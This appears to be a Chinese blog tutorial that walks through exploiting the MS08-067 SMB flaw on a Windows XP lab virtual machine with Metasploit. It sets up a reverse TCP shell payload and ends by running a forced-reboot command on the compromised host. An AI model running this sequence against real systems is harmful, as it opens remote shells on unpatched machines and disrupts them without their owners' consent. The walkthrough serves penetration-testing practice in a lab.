admin管理员组

文章数量:1594261

前期准备

a)攻击主机:为Window10系统(本机)
在Metasploit官方网站下载Windows版本的Metasploit-framework(而不是pro版本),之后安装。在命令行输入 msfconsole 运行Metasploit。

b)目标主机:在网上搜索,安装了WindowsXP虚拟机,在Vmware中装载运行

安装完成后要对WindowsXP虚拟机做如下设置,否则会导致在exploit时显示连接超时或者拒绝连接。关闭防火墙,自动更新即可。

开始渗透测试

查找漏洞

输入命令:search ms08_067

选择模块

输入命令:use exploit/windows/smb/ms08_067_netapi

info命令可以看到此模块的信息

查看该漏洞可浮现操作系统类型

输入命令:show targets

第34个与目标主机匹配

设置目标主机参数

输入命令:show options

输入命令:set RHOSTS 目标主机的IP地址
输入命令:set RPORT 目标主机的端口
目标主机的IP地址:在目标主机命令行中输入 ipconfig 可得

目标主机的端口(本例需要开启445端口):在目标主机命令行输入:netstat -an


可见目标主机的445端口已经开启。如果没有开启,则需要在目标主机的命令行中输入regedit打开注册表,在HKEY_LOCAL_MACHINE中依次打开System\CurrentControlSet\Services\NetBT\Parameters,修改SMBDeviceEnabled的子键值为1。
设置完成之后再次输入 show options

查找并选择合适的攻击载荷

输入命令:show payloads

输入命令:set payload generic/shell_reverse_tcp 选择合适攻击载荷

输入攻击主机的参数
输入命令:set LHOST 攻击主机的IP地址
输入命令:set IPORT 攻击主机的端口
输入命令:set target 34 (34为上述确定)
(IP地址与端口确定同上)
再次输入show options 查看参数设置情况

开始攻击

输入命令:exploit

攻击成功!

测试命令

尝试输入:shutdown -r -f -t 0(为重启命令)

本文标签: 漏洞主机FrameworkMetasploitWindows